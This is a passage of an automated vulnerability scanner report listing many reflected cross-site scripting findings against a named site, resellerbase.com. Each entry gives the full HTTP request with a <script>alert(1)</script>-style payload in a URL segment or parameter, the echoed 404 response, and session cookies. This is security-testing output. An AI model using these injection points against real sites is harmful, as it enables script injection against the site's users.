Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail1e3ec<script>alert(1)</script>3be950208a8/42/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3074. http://www.resellerbase.com/detail/42/themes/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/42/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 846a7<script>alert(1)</script>b32c0b46b6f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42846a7<script>alert(1)</script>b32c0b46b6f/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42846a7<script>alert(1)</script>b32c0b46b6f/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3075. http://www.resellerbase.com/detail/42/themes/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/42/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b7db9<script>alert(1)</script>f22d3aec3a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/themesb7db9<script>alert(1)</script>f22d3aec3a/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themesb7db9<script>alert(1)</script>f22d3aec3a/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3076. http://www.resellerbase.com/detail/42/themes/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/42/themes/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b236c<script>alert(1)</script>eddea815066 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/themes/search.phpb236c<script>alert(1)</script>eddea815066?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes/search.phpb236c<script>alert(1)</script>eddea815066?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3077. http://www.resellerbase.com/detail/42/themes/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/42/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 84d79<a>1d5c65d3655 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/42/themes/search.php?keyword=search...&Submit3=Search84d79<a>1d5c65d3655&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes/search.php?keyword=search...&Submit3=Search84d79<a>1d5c65d3655&opt=2 was not found on this server.</p>
...[SNIP]...

2.3078. http://www.resellerbase.com/detail/42/themes/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/42/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 4dd7f<a>06ca77471b1 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/42/themes/search.php?keyword=search...4dd7f<a>06ca77471b1&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes/search.php?keyword=search...4dd7f<a>06ca77471b1&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3079. http://www.resellerbase.com/detail/42/themes/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/42/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 32db5<script>alert(1)</script>4b54d343902 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/themes/search.php?keyword=search...&Submit3=Search&opt=2&32db5<script>alert(1)</script>4b54d343902=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes/search.php?keyword=search...&Submit3=Search&opt=2&32db5<script>alert(1)</script>4b54d343902=1 was not found on this server.</p>
...[SNIP]...

2.3080. http://www.resellerbase.com/detail/42/themes/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/42/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload b70ce<a>cf6991554f1 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/42/themes/search.php?keyword=search...&Submit3=Search&opt=2b70ce<a>cf6991554f1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes/search.php?keyword=search...&Submit3=Search&opt=2b70ce<a>cf6991554f1 was not found on this server.</p>
...[SNIP]...

2.3081. http://www.resellerbase.com/detail/44/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/44/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 56ee1<script>alert(1)</script>1445f2cdb9f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail56ee1<script>alert(1)</script>1445f2cdb9f/44/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail56ee1<script>alert(1)</script>1445f2cdb9f/44/ was not found on this server.</p>
...[SNIP]...

2.3082. http://www.resellerbase.com/detail/44/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/44/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a6c23<script>alert(1)</script>d85bc3d5af9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44a6c23<script>alert(1)</script>d85bc3d5af9/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44a6c23<script>alert(1)</script>d85bc3d5af9/ was not found on this server.</p>
...[SNIP]...

2.3083. http://www.resellerbase.com/detail/44/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/44/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload cf7f5<script>alert(1)</script>767b5c57b6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/?cf7f5<script>alert(1)</script>767b5c57b6=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/?cf7f5<script>alert(1)</script>767b5c57b6=1 was not found on this server.</p>
...[SNIP]...

2.3084. http://www.resellerbase.com/detail/44/rating.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/44/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e0be3<script>alert(1)</script>2eb62a05850 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaile0be3<script>alert(1)</script>2eb62a05850/44/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:37:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaile0be3<script>alert(1)</script>2eb62a05850/44/rating.php was not found on this server.</p>
...[SNIP]...

2.3085. http://www.resellerbase.com/detail/44/rating.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/44/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 89eb6<script>alert(1)</script>dd15b82a573a773bd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail89eb6<script>alert(1)</script>dd15b82a573a773bd/44/rating.php?id=44&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail89eb6<script>alert(1)</script>dd15b82a573a773bd/44/rating.php?id=44&rating=5 was not found on this server.</p>
...[SNIP]...

2.3086. http://www.resellerbase.com/detail/44/rating.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/44/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 24978<script>alert(1)</script>f55db671bc6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4424978<script>alert(1)</script>f55db671bc6/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:37:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4424978<script>alert(1)</script>f55db671bc6/rating.php was not found on this server.</p>
...[SNIP]...

2.3087. http://www.resellerbase.com/detail/44/rating.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/44/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e239e<script>alert(1)</script>a86fc4f29c5b5ee73 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/44e239e<script>alert(1)</script>a86fc4f29c5b5ee73/rating.php?id=44&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44e239e<script>alert(1)</script>a86fc4f29c5b5ee73/rating.php?id=44&rating=5 was not found on this server.</p>
...[SNIP]...

2.3088. http://www.resellerbase.com/detail/44/rating.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/44/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 863cc<script>alert(1)</script>26d296d8bd6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/rating.php863cc<script>alert(1)</script>26d296d8bd6 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:37:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/rating.php863cc<script>alert(1)</script>26d296d8bd6 was not found on this server.</p>
...[SNIP]...

2.3089. http://www.resellerbase.com/detail/44/rating.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/44/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8fb30<script>alert(1)</script>472944b2e14a93480 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/44/rating.php8fb30<script>alert(1)</script>472944b2e14a93480?id=44&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/rating.php8fb30<script>alert(1)</script>472944b2e14a93480?id=44&rating=5 was not found on this server.</p>
...[SNIP]...

2.3090. http://www.resellerbase.com/detail/44/rating.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/44/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload a1083<script>alert(1)</script>e11785da109ed9772 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/44/rating.php/a1083<script>alert(1)</script>e11785da109ed9772?id=44&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/rating.php/a1083<script>alert(1)</script>e11785da109ed9772?id=44&rating=5 was not found on this server.</p>
...[SNIP]...

2.3091. http://www.resellerbase.com/detail/44/rating.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/44/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 6d052<script>alert(1)</script>3b51c52d672 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/rating.php?6d052<script>alert(1)</script>3b51c52d672=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:36:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/rating.php?6d052<script>alert(1)</script>3b51c52d672=1 was not found on this server.</p>
...[SNIP]...

2.3092. http://www.resellerbase.com/detail/44/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/44/search.php

Issue detail

